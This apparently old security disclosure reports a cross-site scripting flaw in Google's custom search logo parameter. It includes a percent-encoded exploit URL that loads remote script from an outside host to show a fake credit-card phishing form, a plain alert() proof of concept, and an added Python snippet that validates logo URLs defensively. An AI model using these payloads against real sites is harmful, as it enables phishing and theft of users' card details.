Website: www.google.com

Description: Google's custom web search does not prevent JavaScript from being inserted into the URL of the logo image, allowing malicious users to modify the content of the Google page. This enables phishing attacks, silently stealing search terms, results and clicks, or modifying actual searches so that they always contain attacker-controlled results. Given Google's trusted status, the risk is almost certainly high.

The exploit is easiest to produce through a custom Google search form, which are commonly seen, used and understood on the web, but it can also be done through a simple link. This one works in IE:

http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27

(This is an example of using the exploit for phishing: it changes the Google search page to a page informing the user that Google is now a chargeable service and that they should enter their credit card details to continue. These are then logged on my site and the user is returned to a working Google. Currently there is a confirm box warning the user before the form is submitted.)

This example only works in IE, but other UAs also execute the JavaScript, it being a Google vulnerability, not an IE one. The exploit can be simply demonstrated with the simpler URL:

http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')

The exploit has been public for over 2 years, and Google has been informed on multiple occasions. More information and another example exploit are at http://jibbering.com/2004/10/google.html

Jim Ley.
http://jibbering.com/
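The root cause described above is a logo URL taken from the cof=L: field and written into an image tag without checking its scheme. As an added example (not Google's code and not part of the original post), the following Python shows how a search page should handle that field defensively: the value is percent-decoded, control characters are stripped, and only absolute http(s) URLs are accepted; the helper names and the example.com logo are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Only plain web URLs may be used as the custom logo image.
ALLOWED_SCHEMES = {"http", "https"}

# Browsers ignore leading whitespace and embedded ASCII control characters
# when reading a URL scheme, so strip them before inspecting the scheme.
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")


def parse_cof(cof: str) -> dict:
    """Split a 'cof' value such as 'L:http://x/logo.gif;LH:50' into fields."""
    fields = {}
    for field in cof.split(";"):
        if ":" in field:
            key, value = field.split(":", 1)
            fields[key.strip()] = value
    return fields


def is_safe_logo_url(value: str) -> bool:
    """True only for absolute http(s) URLs; javascript: and friends are rejected."""
    # The query string was already percent-decoded once; decoding again
    # also defeats a double-encoded scheme such as %256a%2561...
    candidate = _CTRL_WS.sub("", unquote(value))
    parts = urlsplit(candidate)
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def logo_img_tag(query_string: str) -> str:
    """Render the logo <img> only when the L: field passes validation.

    Returns an empty string (no custom logo) for anything else.
    """
    params = parse_qs(query_string)
    cof = params.get("cof", [""])[0]
    logo = parse_cof(cof).get("L", "")
    if not is_safe_logo_url(logo):
        return ""
    # Escaping keeps a quote or angle bracket in the URL inside the attribute.
    return '<img src="%s">' % html.escape(logo, quote=True)


if __name__ == "__main__":
    # Constructed inputs: a legitimate logo and the advisory's own alert() URL.
    print(logo_img_tag("cof=L:http://example.com/logo.gif%3BLH:50"))
    print(repr(logo_img_tag("cof=L:javascript:javascript:alert('EEK!')")))
```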